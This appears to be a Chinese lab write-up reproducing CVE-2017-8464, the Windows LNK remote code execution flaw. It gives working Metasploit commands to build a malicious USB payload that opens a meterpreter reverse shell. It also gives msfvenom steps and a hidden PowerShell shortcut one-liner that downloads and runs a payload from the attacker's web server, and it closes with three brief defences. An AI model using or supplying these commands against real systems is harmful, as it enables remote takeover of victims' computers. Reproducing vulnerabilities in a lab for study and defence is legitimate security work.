CVE-2017-8464复现(震网三代)

一.影响版本

windows 10

windwos RT 8.1

windows 8.1

windows 7

windows server 2016

windows server 2012 R2

windows server 2012

windows server 2008 R2

windows server 2008

二.漏洞利用与复现

攻击机:kai liunx          ip:192.168.1.101

目标机:windows 7 专业版

1.payload1:Metasploit中CVE-2017-8464模块制作U盘

终端打开metasploit,msfconsole

CVE-2017-8464复现(震网三代)_第1张图片

CVE-2017-8464复现(震网三代)_第2张图片

搜索漏洞模块,search cve_2017_8464

CVE-2017-8464复现(震网三代)_第3张图片

使用攻击模块,use exploit/windows/fileformat/cve_2017_8464_lnk_rce

CVE-2017-8464复现(震网三代)_第4张图片

对参数进行设置:

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.1.101  (kai liunx  ip)

检查配置是否设置成功:show options

CVE-2017-8464复现(震网三代)_第5张图片

target默认就可以了它会自动选择,也可以自己选择对应的系统版本

CVE-2017-8464复现(震网三代)_第6张图片

开始运行,exploit

CVE-2017-8464复现(震网三代)_第7张图片

注:生成文件存放在/root/.msf4/local/下,注意.msf4是隐藏文件夹

复制生成的文件到自己的移动U盘里

CVE-2017-8464复现(震网三代)_第8张图片

回到kai liunx,使用监听模块,use multi/handler

CVE-2017-8464复现(震网三代)_第9张图片

设置对应的配置:

set paylaod windows/meterpreter/reverse_tcp

set lhost 192.168.1.101

开始监听,exploit

下面就开始你的表演了,把U盘插入目标机,如果是设置了自动播放的话会直接运行FlashPlayerCPLApp.cpl文件,反弹一个session到kai liunx,如果没有就需要手动双击下FlashPlayerCPLApp.cpl文件,反弹session

CVE-2017-8464复现(震网三代)_第10张图片

注:如果没有弹出meterpreter,可以自己选择session进入,session 1

输入shell,成功控制目标机

CVE-2017-8464复现(震网三代)_第11张图片

2.payload2:利用Powershell快捷键

生成攻击文件,search.ps1,终端输入msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.101 -f  psh-reflection>search.ps1

CVE-2017-8464复现(震网三代)_第12张图片

输入ls进行查看

移动文件到网站根目录/var/www/html下,mv search.ps1 /var/www/html


cd到网站目录下,cd /var/www/html,查看是否移动成功ls

启动apache2服务,并查看是否成功

service apache2 start

service apache2 status

CVE-2017-8464复现(震网三代)_第13张图片

打开metasploit,msfconsole

CVE-2017-8464复现(震网三代)_第14张图片

使用监听模块,use multi/handler

对参数进行设置

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.1.101


运行模块,exploit

打开目标机,右键新建一个快捷键

CVE-2017-8464复现(震网三代)_第15张图片

输入构造的语句payload:(记得修改成自己kai liunx的ip)

powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString(‘http://192.168.1.101/search.ps1‘);test.ps1"

CVE-2017-8464复现(震网三代)_第16张图片

进行命名

CVE-2017-8464复现(震网三代)_第17张图片

CVE-2017-8464复现(震网三代)_第18张图片

双击快捷键,成功返回到metasploit上一个session

输入shell,就可以控制目标机了

防御方法:

1.及时打上相应补丁

2.关闭USB自动播放

3.安装杀毒软件


感谢各位大佬赏脸,有什么不足的地方请多多指教,欢迎意见轰炸,谢谢!!!

你可能感兴趣的:(漏洞复现)